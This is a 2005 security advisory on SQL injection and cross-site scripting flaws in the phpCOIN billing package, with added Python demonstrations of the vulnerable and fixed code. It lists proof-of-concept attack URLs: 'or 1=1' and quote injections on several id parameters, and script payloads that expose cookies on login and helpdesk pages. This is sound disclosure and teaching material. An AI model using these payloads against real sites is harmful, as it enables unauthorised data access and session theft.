#############################################
phpCOIN possible SQL injection commands and XSS
vendor url: http://www.phpcoin.com/
vendor notified: yes    exploit available: yes
advisory: http://lostmon.blogspot.com/2005/03/phpcoin-posible-sql-injection-comands.html
last updated: 05/03/2005
OSVDB ID: 15043,15044,15045,15046,15047,15048....
Secunia: SA14439
Securitytracker: 1013329
#############################################
phpCOIN is a free software package originally designed for web-hosting resellers to handle clients, orders, invoices,
notes and helpdesk, but it is no longer limited to hosting resellers.
Some variables are not properly validated, which permits
SQL injection commands and cross-site scripting attacks.
############
SQL injection:
############
A stray quote in a numeric parameter breaks the query and discloses some SQL data in the error...
http://[target]phpcoin/mod.php?mod=siteinfo&id=1'
and then the same numeric ids accept an appended boolean condition:
http://[target]phpcoin/mod.php?mod=faq&mode=show&faq_id=2%20or%201=1
http://[target]phpcoin/mod.php?mod=pages&mode=view&id=25%20or%201=1
http://[target]phpcoin/mod.php?mod=siteinfo&id=4%20or%201=1
http://[target]phpcoin/mod.php?mod=articles&mode=list&dtopic_id=1%20or%201=1
http://[target]phpcoin/mod.php?mod=orders&mode=view&ord_id=1002%20or%201=1
http://[target]phpcoin/mod.php?mod=domains&mode=view&dom_id=2%20or%201=1
http://[target]phpcoin/mod.php?mod=invoices&mode=view&invc_id=1002%20or%201=1
Exploiting some of these flaws requires a client or admin login.
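The two payload shapes above (a bare quote, and an appended "or 1=1") are worth seeing against a real query. The following is an added example written for this page, not phpCOIN's code: the "faq" table, its is_public column and both lookup functions are assumptions standing in for whatever phpCOIN's mod.php does with faq_id. It builds the query the insecure way, feeds it the advisory's own URLs, and then shows the integer-validated, parameter-bound form that rejects both payloads.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit


# Constructed sample data: a stand-in "faq" table with one non-public row.
# phpCOIN's real schema and query code are not shown in the advisory; this
# table, the is_public column and both lookup functions are assumptions.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE faq (faq_id INTEGER PRIMARY KEY, question TEXT, is_public INTEGER)"
    )
    con.executemany(
        "INSERT INTO faq VALUES (?, ?, ?)",
        [
            (1, "How do I pay an invoice?", 1),
            (2, "How do I open a helpdesk ticket?", 1),
            (3, "Internal: reseller pricing notes", 0),
        ],
    )
    return con


def param_from_url(url, name):
    """Pull one query-string parameter out of an advisory-style URL, %XX-decoded."""
    return parse_qs(urlsplit(url).query)[name][0]


def vulnerable_lookup(con, faq_id):
    """Unvalidated parameter pasted straight into the SQL string (the flaw class)."""
    sql = (
        "SELECT faq_id, question FROM faq "
        f"WHERE is_public = 1 AND faq_id = {faq_id}"
    )
    # "2 or 1=1" parses as (is_public = 1 AND faq_id = 2) OR 1=1: every row leaks.
    # "1'" leaves an unterminated string and the database raises a syntax error.
    return con.execute(sql).fetchall()


def safe_lookup(con, faq_id):
    """Same query, with the id validated as an integer and bound as a parameter."""
    if not str(faq_id).isdigit():
        raise ValueError(f"faq_id must be a positive integer, got {faq_id!r}")
    sql = "SELECT faq_id, question FROM faq WHERE is_public = 1 AND faq_id = ?"
    return con.execute(sql, (int(faq_id),)).fetchall()


def probe(con, lookup, raw_id):
    """Run a lookup and report the rows returned, or the error the caller would see."""
    try:
        return {"rows": lookup(con, raw_id), "error": None}
    except (sqlite3.OperationalError, ValueError) as exc:
        return {"rows": [], "error": f"{type(exc).__name__}: {exc}"}


if __name__ == "__main__":
    con = make_db()
    base = "http://target/phpcoin/mod.php?mod=faq&mode=show&faq_id="
    for suffix in ("2", "1'", "2%20or%201=1"):
        raw = param_from_url(base + suffix, "faq_id")
        print(f"faq_id={raw!r}")
        print("  vulnerable:", probe(con, vulnerable_lookup, raw))
        print("  safe:      ", probe(con, safe_lookup, raw))
```

The vulnerable path returns the non-public row for the "or 1=1" URL and a database syntax error for the quote URL, which is the error-message disclosure the advisory alludes to; the validated path returns only the requested public row and turns both payloads into a plain input error before any SQL is built.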
#################
cross-site scripting:
#################
http://[target]phpcoin/mod.php?mod=helpdesk&mode=new%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/mod.php?mod=mail&mode=reset&w=user%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/login.php?w=user&o=login&e=u%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/login.php?w=admin&o=login%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
Other scripts are susceptible to HTML or JavaScript code injection...
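The payload in every URL above starts with %22%3E, a quote and a closing bracket, which only makes sense if the parameter is echoed inside an HTML attribute value. The following is an added example written for this page, not phpCOIN's template: the login form markup, and the assumption that login.php reflects the "w" and "e" parameters into hidden fields, are constructed for the demonstration. It renders the advisory's login.php URL both unescaped and with attribute-safe escaping.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Assumed page fragment: a login form that echoes the "w" (user/admin) and "e"
# parameters back into hidden-field values. phpCOIN's real template is not in
# the advisory; this markup is constructed for the example.
TEMPLATE = (
    '<form action="login.php" method="post">\n'
    '<input type="hidden" name="w" value="{w}">\n'
    '<input type="hidden" name="e" value="{e}">\n'
    '<input type="submit" value="Login">\n'
    "</form>"
)

# The advisory's own URL (target host is a placeholder).
ADVISORY_URL = (
    "http://target/phpcoin/login.php?w=user&o=login"
    "&e=u%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E"
)


def param_from_url(url, name):
    """Return one %XX-decoded query parameter, or "" if it is absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(url):
    """Reflect the parameters verbatim: the '">' prefix closes the attribute and
    the tag, so the rest of the value becomes live markup."""
    return TEMPLATE.format(w=param_from_url(url, "w"), e=param_from_url(url, "e"))


def render_safe(url):
    """Escape &, <, >, " and ' before interpolating into an attribute value, the
    same transformation PHP's htmlspecialchars($s, ENT_QUOTES) applies."""
    def esc(value):
        return html.escape(value, quote=True)

    return TEMPLATE.format(w=esc(param_from_url(url, "w")), e=esc(param_from_url(url, "e")))


def has_script_breakout(rendered):
    """True if the reflected value produced a real <script> tag in the output."""
    return "<script>" in rendered.lower()


if __name__ == "__main__":
    print("--- unescaped reflection ---")
    print(render_vulnerable(ADVISORY_URL))
    print("--- escaped reflection ---")
    print(render_safe(ADVISORY_URL))
```

Escaping at the point of output is the fix that applies regardless of which phpCOIN script reflects the value; the vulnerable render still counts two hidden inputs but also carries a third element, the injected script, which is exactly what document.write(document.cookie) in the payload is there to prove.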
##################
versions affected:
##################
1.2.0
1.2.1b
1.2.1
##########
Solution :
##########
no solution was available at this time; look for vendor information
or for new release versions.
Sincerely:
Lostmon (lostmon@gmail.com)
Thanks to Estrella for being my light
Thanks to all who believed in me
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what keeps the mind moving....
######################
updated at 04/03/2005
######################
Today I received a mail from a person who is worried
about their phpCOIN servers, and a mail with a vendor
response where he says he is working on a fix and gave
me some code to look at. Good !!
I decided to delete the update post, so as not to alarm anyone.
Any issue found is "critical"... but it needs to be fixed ... and
the phpCOIN vendor is now working on a fix; you can look here:
http://forums.phpcoin.com/index.php?showtopic=4116
thanks Karl for your mail :)
#####################
Updated at 05/03/2005
#####################
The phpCOIN vendor has released version 1.2.2
of phpCOIN to me; I tested all the issues and apparently all
are now patched. Good work !!
Solution:
wait for the release of that version and update your installation.